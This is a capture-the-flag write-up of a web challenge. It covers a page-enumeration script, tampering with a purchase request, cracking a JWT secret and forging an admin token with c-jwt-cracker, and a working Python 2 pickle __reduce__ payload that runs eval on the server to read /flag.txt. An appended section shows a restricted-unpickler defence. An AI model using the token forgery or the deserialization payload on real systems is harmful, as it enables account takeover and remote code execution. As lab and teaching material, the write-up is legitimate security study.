[North China Regional] ikun
Brute-forcing the page with lv6
import requests

# Walk the shop pages until the one that carries the lv6 item image appears
for i in range(512):
    url = f"http://78cd9dcd-96d8-4fb8-9785-be448ad9dc9e.node3.buuoj.cn/shop?page={i}"
    response = requests.get(url=url)
    if response.text.find("lv6.png") != -1:
        print(i)
        break
It is on page 181. Intercept the purchase request and modify the discount rate; this redirects to b1g_m4mber, which says admin access is required. Inspecting the request shows that authentication is a JWT.
Brute-force the JWT secret with c-jwt-cracker
$ docker build . -t jwtcrack
$ docker run -it --rm jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Imd1ZXN0In0.dDz06h0lkd5_0DT8vUVcGLBGvX2btxx2AyJJCQWkEoQ
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.40on__HQ8B2-wM1ZSwax3ivRK4j54jlaXv-1JjQynjo

The source code is leaked; the deserialization sink is in Admin.py.
import tornado.web
from sshop.base import BaseHandler
import pickle
import urllib


class AdminHandler(BaseHandler):
    @tornado.web.authenticated
    def get(self, *args, **kwargs):
        if self.current_user == "admin":
            return self.render('form.html', res='This is Black Technology!', member=0)
        else:
            return self.render('no_ass.html')

    @tornado.web.authenticated
    def post(self, *args, **kwargs):
        try:
            become = self.get_argument('become')
            # Sink: user-controlled data is URL-decoded and handed straight to pickle.loads
            p = pickle.loads(urllib.unquote(become))
            return self.render('form.html', res=p, member=1)
        except:
            return self.render('form.html', res='This is Black Technology!', member=0)
The __reduce__ method is invoked during deserialization, much like PHP's __wakeup; the script below follows 王叹之's script.
# Python 2 (the challenge environment): urllib.quote and print without parentheses
import pickle
import urllib


class payload(object):
    def __reduce__(self):
        # Called by pickle on load; returns (callable, args) that pickle then invokes
        return (eval, ("open('/flag.txt','r').read()",))


a = pickle.dumps(payload())
a = urllib.quote(a)
print a
An important point: the challenge environment runs Python 2, and deserialization in Python 2 and Python 3 is not the same, which had me stuck for quite a while.
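As an added defensive illustration that is not part of the original writeup, here is a Python 3 counterpart of the `become` handling that refuses any pickle referencing a global outside a small allowlist, so a `__reduce__` pointing at `eval` is rejected inside `find_class` before anything is executed (the only real fix is to stop unpickling user input at all, e.g. use JSON). `RestrictedUnpickler`, `handle_become`, `build_become_param` and the benign `Payload` stand-in are names constructed for this example.

```python
import io
import pickle
import urllib.parse

# Hardened counterpart of the vulnerable `pickle.loads(urllib.unquote(become))`.
# All names below are constructed for this example, not from the challenge code.

ALLOWED_GLOBALS = {
    ("builtins", "dict"),
    ("builtins", "list"),
    ("builtins", "set"),
}


class RestrictedUnpickler(pickle.Unpickler):
    """Resolve only globals listed in ALLOWED_GLOBALS; anything else aborts the load."""

    def find_class(self, module, name):
        # Invoked for every GLOBAL/STACK_GLOBAL opcode, i.e. before a __reduce__
        # callable such as eval is even looked up, let alone called.
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")


def safe_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def build_become_param(obj) -> str:
    """Serialize the way the client does: pickle, then URL-encode."""
    return urllib.parse.quote(pickle.dumps(obj))


def handle_become(become: str):
    """Replacement for AdminHandler.post(): returns ("ok", value) or ("rejected", reason)."""
    data = urllib.parse.unquote_to_bytes(become)
    try:
        return ("ok", safe_loads(data))
    except pickle.UnpicklingError as exc:
        return ("rejected", str(exc))


class Payload:
    """Benign stand-in for the writeup's __reduce__ gadget (would evaluate 1+1)."""

    def __reduce__(self):
        return (eval, ("1+1",))
```

A plain dict still round-trips, while the gadget is refused the moment the unpickler meets the `builtins.eval` reference.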